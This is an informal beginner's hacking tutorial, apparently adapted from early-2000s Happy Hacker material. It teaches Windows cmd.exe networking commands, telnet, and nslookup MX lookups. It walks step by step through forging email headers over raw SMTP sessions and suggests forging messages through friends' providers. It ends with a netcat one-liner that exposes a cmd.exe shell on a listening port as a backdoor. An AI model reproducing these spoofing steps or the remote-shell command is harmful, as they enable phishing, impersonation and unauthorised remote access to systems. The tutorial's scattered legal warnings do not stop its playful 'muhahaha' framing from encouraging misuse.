Window 3, and DOS only operating systems.

The other DOS, which comes only with XP, 2000 and NT, is cmd.exe. Usually
cmd.exe is better than command.com because it is easier to use, has more
commands, and in some ways resembles the bash shell in Linux and other Unix-type
operating systems. For example, you can repeat a command by using the up arrow
until you back up to the desired command. Unlike bash, however, your DOS command
history is erased whenever you shut down cmd.exe. The reason XP has both
versions of DOS is that sometimes a program that won?t run right in cmd.exe will
work in command.com

note : m not comparing bash to dos


DOS is your number one Windows gateway to the Internet, and the open sesame to
local area networks. From DOS, without needing to download a single hacker
program, you can do amazingly sophisticated explorations and even break into
poorly defended computers.


****************
You can go to jail warning: Breaking into computers is against the law if you do
not have permission to do so from the owner of that computer. For example, if
your friend gives you permission to break into her Hotmail account, that won't
protect you because Microsoft owns Hotmail and they will never give you
permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for
bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN
permission before demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying
something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type
"help" at the DOS prompt, it gives you a long list of commands. However, this
list leaves out all the commands hackers love to use. Here are some of those
left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can
guess by the name, TCP/IP is the protocol under which the Internet runs. along
with user datagram protocol (UDP). So when you are connected to the Internet,
you can try these commands against other Internet computers. Most local area
networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate
between computers. This is often used by Windows computers, and by Unix/Linux
type computers running Samba. You can often use NetBIOS commands over the
Internet (being carried inside of, so to speak, TCP/IP). In many cases, however,
NetBIOS commands will be blocked by firewalls. Also, not many Internet computers
run NetBIOS because it is so easy to break in using them. I will cover NetBIOS
commands in the next article to XP Hacking.

The queen of hacker commands is telnet. To get Windows help for telnet, in the
cmd.exe window give the command:

C:\>telnet /?

Here's what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]

-a Attempt automatic logon. Same as --l option except uses the currently logged
on user's name.
-e Escape character to enter telnet cclient prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system. Requires that
the remote system support the TELNET ENVIRON option.
-t Specifies terminal type. Supportedd term types are vt100, vt52, ansi and vtnt
only.
host Specifies the hostname or IP address of the remote computer to connect to.
port Specifies a port number or service name.


****************
Newbie note: what is a port on a computer? A computer port is sort of like a
seaport. It's where things can go in and/or out of a computer. Some ports are
easy to understand, like keyboard, monitor, printer and modem. Other ports are
virtual, meaning that they are created by software. When that modem port of
yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has
the ability to open or close any of over 65,000 different virtual ports, and has
the ability to connect to any of these on another computer - if it is running
that port, and if a firewall doesn?t block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two
ways: by number or by name.
****************

The simplest use of telnet is to log into a remote computer. Give the command:

C:/>telnet targetcomputer.com (substituting the name of the computer you want to
telnet into for targetcomputer.com)

If this computer is set up to let people log into accounts, you may get the
message:

login:

Type your user name here, making sure to be exact. You can't swap between lower
case and capital letters. For example, user name Guest is not the same as guest.

****************
Newbie note: Lots of people email me asking how to learn what their user name
and password are. Stop laughing, darn it, they really do. If you don't know your
user name and password, that means whoever runs that computer didn't give you an
account and doesn't want you to log on.
****************

Then comes the message:

Password:

Again, be exact in typing in your password.

What if this doesn't work?

Every day people write to me complaining they can't telnet. That is usually
because they try to telnet into a computer, or a port on a computer that is set
up to refuse telnet connections. Here's what it might look like when a computer
refuses a telnet connection:

C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A
connection attempt failed because the connected party did not properly respond
after a period of time, or established connection failed because connected host
has failed to respond.

Or you might see:

C:\ >telnet hotmail.com
Connecting To hotmail.com...Could not open connection to the host, on port
23. No connection could be made because the target machine actively refused it.

If you just give the telnet command without giving a port number, it will
automatically try to connect on port 23, which sometimes runs a telnet server.

**************
Newbie note: your Windows computer has a telnet client program, meaning it will
let you telnet out of it. However you have to install a telnet server before
anyone can telnet into port 23 on your computer.
*************

If telnet failed to connect, possibly the computer you were trying to telnet
into was down or just plain no longer in existence. Maybe the people who run
that computer don't want you to telnet into it.

Even though you can't telnet into an account inside some computer, often you can
get some information back or get that computer to do something interesting for
you. Yes, you can get a telnet connection to succeed -without doing anything
illegal --against almost any computer, even if you don't have permission to log
in. There are many legal things you can do to many randomly chosen computers
with telnet. For example:

C:/telnet freeshell.org 22

SSH-1.99-OpenSSH_3.4p1

That tells us the target computer is running an SSH server, which enables
encrypted connections between computers. If you want to SSH into an account
there, you can get a shell account for free at http://freeshell.org . You can
get a free SSH client program from http://winfiles.com .

***************
You can get punched in the nose warning: Your online provider might kick you off
for making telnet probes of other computers. The solution is to get a local
online provider and make friends with the people who run it, and convince them
you are just doing harmless, legal explorations.
*************

Sometimes a port is running an interesting program, but a firewall won't let you
in. For example, 10.0.0.3, a computer on my local area network, runs an email
sending program, (sendmail working together with Postfix, and using Kmail to
compose emails). I can use it from an account inside 10.0.0.3 to send emails
with headers that hide from where I send things.

If I try to telnet to this email program from outside this computer, here's what
happens:

C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3...Could not open connection to the host, on port 25. No
connection could be made because the target machine actively refused it.

However, if I log into an account on 10.0.0.3 and then telnet from inside to
port 25, here's what I get:

Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun...
cmeinel@test-box:~> telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical address meaning
localhost, the same computer you are logged into]
Connected to localhost.
Escape character is '^]'.
220 test-box.local ESMTP Postfix

The reason I keep this port 25 hidden behind a firewall is to keep people from
using it to try to break in or to forge email. Now the ubergeniuses reading this
will start to make fun of me because no Internet address that begins with 10. is
reachable from the Internet. However, sometimes I place this "test-box" computer
online with a static Internet address, meaning whenever it is on the Internet,
it always has the same numerical address. I'm not going to tell you what its
Internet address is because I don't want anyone messing with it. I just want to
mess with other people's computers with it, muhahaha. That's also why I always
keep my Internet address from showing up in the headers of my emails.

***************
Newbie note: What is all this about headers? It's stuff at the beginning of an
email that may - or may not - tell you a lot about where it came from and when.
To see full headers, in Outlook click view -> full headers. In Eudora, click the
"Blah blah blah" icon.
****************

Want a computer you can telnet into and mess around with, and not get into
trouble no matter what you do to it? I've set up my techbroker.com
(206.61.52.33) with user xyz, password guest for you to play with. Here's how to
forge email to xyz@techbroker.com using telnet. Start with the command:

C:\>telnet techbroker.com 25
Connecting To Techbroker.com

220 Service ready

Now you type in who you want the message to appear to come from:

helo santa@techbroker.com
Techbroker.com will answer:

250 host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed

Your next command:
data
354 Start main input; end with .


just means hit return. In case you can't see that little
period between the s, what you do to end composing your email is to hit
enter, type a period, then hit enter again. Anyhow, try typing:

This is a test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the message we
just composed looks like:

Status: R
X-status: N

This is a test.

That's a pretty pathetic forged email, huh? No "from", no date. However, you can
make your headers better by using a trick with the data command. After you give
it, you can insert as many headers as you choose. The trick is easier to show
than explain:

220 Service ready
helo santa@northpole.org
250 host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:cmeinel@techbroker.com
250 Requested mail action okay, completed
data
354 Start main input; end with .
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.

The trick is to start each line you want in the headers with one word followed
by a colon, and the a line followed by "return". As soon as you write a line
that doesn't begin this way, the rest of what you type goes into the body of the
email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up
in the header. Some mail servers would show both "from" addresses.

You can forge email on techbroker.com within one strict limitation. Your email
has to go to someone at techbroker.com. If you can find any way to send email to
someone outside techbroker, let us know, because you will have broken our
security, muhahaha! Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet:

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:
user xyz
+OK user is known

Then type in this:
pass test
+OK mail drop has 2 message(s)

retr 1
+OK message follows
This is a test.

If you want to know all possible commands, give this command:

help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP

Unless you use a weird online provider like AOL, you can use these same tricks
to send and receive your own email. Or you can forge email to a friend by
telnetting to his or her online provider's email sending computer(s).

With most online providers you need to get the exact name of their email
computer(s). Often it is simply mail.targetcomputer.com (substitute the name of
the online provider for targetcomputer). If this doesn't work, you can find out
the name of their email server with the DOS nslookup program, which only runs
from cmd.exe. Here's an example:


C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

> set q=mx
> dimensional.com
Server: DNS1.wurld.net
Address: 206.61.52.11

dimensional.com MX preference = 5, mail exchanger =
mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com
dimensional.com nameserver = ns.dimensional.com
dimensional.com nameserver = ns-1.dimensional.com
dimensional.com nameserver = ns-2.dimensional.com
dimensional.com nameserver = ns-3.dimensional.com
dimensional.com nameserver = ns-4.dimensional.com
mail.dimensional.com internet address = 206.124.0.11
mx2.dimensional.com internet address = 206.124.0.30
mx3.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.10
ns.dimensional.com internet address = 206.124.26.254
ns.dimensional.com internet address = 206.124.0.254
ns.dimensional.com internet address = 206.124.1.254
ns.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.32
ns.dimensional.com internet address = 206.124.0.30
ns.dimensional.com internet address = 206.124.0.25
ns.dimensional.com internet address = 206.124.0.15
ns.dimensional.com internet address = 206.124.0.21
ns.dimensional.com internet address = 206.124.0.9
ns-1.dimensional.com internet address = 206.124.26.254
ns-2.dimensional.com internet address = 209.98.32.54
ns-3.dimensional.com internet address = 206.124.1.254
ns-4.dimensional.com internet address = 206.124.0.254
>

The lines that tell you what computers will let you forge email to people with
@dimensional.com addresses are:

dimensional.com MX preference = 5, mail exchanger =
mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com

MX stands for mail exchange. The lower the preference number, the more they
would like you to use that address for email.If that lowest number server is too
busy, then try another server.

Sometimes when you ask about a mail server, nslookup will give you this kind of
error message:

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to [207.217.120.202] timed-out

To get around this problem, you need to find out what are the domain servers for
your target online provider. A good place to start looking is
http://netsol.com/cgi-bin/whois/whois . If this doesn't work, see
http://happyhacker.org/HHA/fightback.shtml for how to find the domain servers
for any Internet address.

****************
Newbie note: A domain name server provides information on the names and numbers
assigned to computers on the Internet. For example, dns1.wurld.net and
dns2.wurld.net contain information on happyhacker.org, techbroker.com,
securitynewsportal.com, thirdpig.com and sage-inc.com. When you query
dns1.wurld.net about other computers, it might have to go hunting for that
information from other name servers. That's why you might get a timed out
failure.
***************

Once you know the domain servers for an online service, set one of them for the
server for your nslookup program. Here's how you do it:

C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

Now give the command:

> server 207.217.126.41
Default Server: ns1.earthlink.net
Address: 207.217.126.41

Next command should be:
> set q=mx
> earthlink.net
Server: ns1.earthlink.net
Address: 207.217.126.41

earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net
earthlink.net nameserver = ns3.earthlink.net
earthlink.net nameserver = ns1.earthlink.net
earthlink.net nameserver = ns2.earthlink.net
mx00.earthlink.net internet address = 207.217.120.28
mx01.earthlink.net internet address = 207.217.120.29
mx02.earthlink.net internet address = 207.217.120.79
mx03.earthlink.net internet address = 207.217.120.78
mx04.earthlink.net internet address = 207.217.120.249
mx05.earthlink.net internet address = 207.217.120.31
mx06.earthlink.net internet address = 207.217.120.23
ns1.earthlink.net internet address = 207.217.126.41
ns2.earthlink.net internet address = 207.217.77.42
ns3.earthlink.net internet address = 207.217.120.43
>

Your own online service will usually not mind and may even be glad if you use
telnet to read your email. Sometimes a malicious person or faulty email program
will send you a message that is so screwed up that your email program can't
download it. With telnet you can manually delete the bad email. Otherwise tech
support has to do it for you.

If you think about it, this ability to forge email is a huge temptation to
spammers. How can your online provider keep the bad guys from filling up a
victim's email box with garbage? The first time a bad guy tries this, probably
nothing will stop him or her. The second time the online provider might block
the bad guy at the firewall, maybe call the bad guy's online provider and kick
him or her and maybe get the bad guy busted or sued.

**************
You can go to jail warning: Sending hundreds or thousands of junk emails to bomb
someone's email account is a felony in the US.
***************

***************
You can get sued warning: Spamming, where you send only one email to each
person, but send thousands or millions of emails, is borderline legal. However,
spammers have been successfully sued when they forge the email addresses of
innocent people as senders of their spam.
****************

Now that you know how to read and write email with telnet, you definitely have
something you can use to show off with. Happy hacking!

Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a
free program written by Weld Pond and Hobbit, and available from many sites, for
example
http://www.atstake.com/research/tools/#network_utilities . It is basically
telnet on steroids. For example, using netcat, you can set up a port on your
Windows computer to allow people to telnet into a DOS shell by using this
command:

C:\>nc -L -p 5000 -t -e cmd.exe

You can specify a different port number than 5000. Just make sure it doesn't
conflict with another port by checking with the netstat command. Then you and
your friends, enemies and random losers can either telnet in or netcat in with
the command:

C:\>nc -v [ipaddress of target] [port]

Of course you will probably get hacked for setting up this port. However, if you
set up a sniffer to keep track of the action, you can turn this scary back door
into a fascinating honeypot. For example, you could run it on port 23 and watch
all the hackers who attack with telnet hoping to log in. With some programming
you could even fake a unix-like login sequence and play some tricks on your
attackers.
By
HaSsAn SoHail